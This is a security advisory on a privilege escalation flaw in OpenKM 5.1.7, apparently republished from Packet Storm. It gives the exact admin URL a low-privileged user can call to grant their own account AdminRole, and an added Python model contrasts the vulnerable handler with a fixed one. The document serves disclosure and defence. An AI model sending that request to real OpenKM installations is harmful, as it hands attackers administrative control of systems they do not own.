OpenKM Document Management System 5.1.7 Privilege Escalation

2012-01-03T00:00:00
ID PACKETSTORM:108322
Type packetstorm
Reporter Cyrill Brunschwiler
Modified 2012-01-03T00:00:00

Description

##########################################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
##########################################################################
#
# ID: COMPASS-2012-001  
# Product: OpenKM Document Management System 5.1.7 [1]  
# Vendor: OpenKM http://www.openkm.com/  
# Subject: Privilege Escalation, Improper Access Control  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)  
# Date: August 6th 2011  
#  
##########################################################################
  
Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing,
Switzerland, discovered an authorization flaw in the OpenKM solution. OpenKM
allows application administrators to manage users and to assign roles.
Unfortunately, a standard user holding only the UserRole may alter the roles
of existing accounts (including their own, as the exploit below shows). This
is possible because OpenKM does not properly check for sufficient privileges
before applying the change: the changes are applied even though the OpenKM
user interface displays an "insufficient privileges" message to the
unprivileged user.
  
Vulnerable:  
-----------  
OpenKM version 5.1.7  
  
Not vulnerable:  
---------------  
OpenKM version 5.1.8  
  
Workaround:
-----------
Grant access to the /OpenKM/admin path to specific IPs only (requires an
additional WAF or reverse proxy setup [2], or an IP restriction in the web
server itself).
  
Exploit:
--------
Log in as a low-privileged user (having the UserRole) and call the following
URL to gain administrative privileges:

http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id=usr&usr_active=on&usr_roles=AdminRole

The usr_id parameter names the account to modify (here the attacker's own
account "usr") and usr_roles sets the role the account holds afterwards. The
interface still reports "insufficient privileges", but the new role is
persisted.
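The following is an added, self-contained model of the flaw described above; it is not OpenKM's code and was not part of the original advisory. The in-memory user store, the session representation (a caller name looked up in that store) and the two handler functions are assumptions made for illustration; only the URL and its parameters come from the advisory. It shows the bug class behind the report: the authorization result feeds the error message but does not gate the state change, so the "insufficient privileges" message and the persisted role change coexist. The hardened variant denies before touching the store.

```python
"""Model of the OpenKM 5.1.7 userEdit authorization flaw.

Constructed example, not OpenKM's code. The user store, the caller/session
model and the handler names are assumptions for illustration; only the URL
parameters are taken from the advisory.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory user store: username -> set of roles. The attacker
# "usr" starts with the UserRole only, like the advisory's low-privileged user.
USERS = {
    "okmAdmin": {"AdminRole", "UserRole"},
    "usr": {"UserRole"},
}

# The request from the advisory, issued while logged in as "usr".
EXPLOIT_URL = (
    "http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true"
    "&usr_id=usr&usr_active=on&usr_roles=AdminRole"
)


def parse_request(url):
    """Turn the request URL into the flat parameter view a handler would see."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {
        "action": qs.get("action", [""])[0],
        "persist": qs.get("persist", [""])[0] == "true",
        "usr_id": qs.get("usr_id", [""])[0],
        "usr_active": qs.get("usr_active", [""])[0] == "on",
        # usr_roles may be repeated; an account can hold several roles.
        "usr_roles": set(qs.get("usr_roles", [])),
    }


def user_edit_vulnerable(users, caller, params):
    """Check result only decides the message; the write happens regardless.

    Mirrors the advisory: the UI says "insufficient privileges", yet the
    submitted roles are persisted for the target account.
    """
    message = ""
    if "AdminRole" not in users.get(caller, set()):
        message = "insufficient privileges"  # computed for the view only
    if params["action"] == "userEdit" and params["persist"]:
        users[params["usr_id"]] = set(params["usr_roles"])  # applied anyway
    return message


def user_edit_fixed(users, caller, params):
    """Deny by default: the authorization check gates the state change."""
    if "AdminRole" not in users.get(caller, set()):
        return "insufficient privileges"  # nothing below this line runs
    if params["action"] != "userEdit":
        return "unknown action"
    if params["persist"]:
        users[params["usr_id"]] = set(params["usr_roles"])
    return "ok"


def run(handler):
    """Replay the advisory URL as "usr" against a fresh copy of the store.

    Returns (message shown to the caller, roles of "usr" afterwards).
    """
    users = {name: set(roles) for name, roles in USERS.items()}
    message = handler(users, "usr", parse_request(EXPLOIT_URL))
    return message, users["usr"]


if __name__ == "__main__":
    for name, handler in (("vulnerable", user_edit_vulnerable),
                          ("fixed", user_edit_fixed)):
        message, roles = run(handler)
        print(f"{name:10s} message={message!r} usr roles={sorted(roles)}")
```

Running the block prints the same "insufficient privileges" message for both handlers; the difference is only visible in the store, which is exactly why the flaw went unnoticed from the UI. When reviewing similar admin actions, check that every denial path returns before the persistence call rather than merely setting a message for the view layer.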
  
Timeline:  
---------  
August 6th, Vulnerability discovered  
August 9th, Vendor contacted  
August 10th, Vendor notified  
December 1st, Patched version released  
January 2nd, Advisory released  
  
References:
-----------
[1] OpenKM http://www.openkm.com/
OpenKM is a Free/Libre document management system that provides a web
interface for managing arbitrary files. It includes a content repository,
Lucene indexing, and jBPM workflow. The OpenKM system was developed using
Java technology.

[2] Open Source Web Entry Server
Talk at OWASP AppSec Washington D.C. in November 2010 about setting up an
Apache based Open Source Web Entry Server
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_V2.2.ppt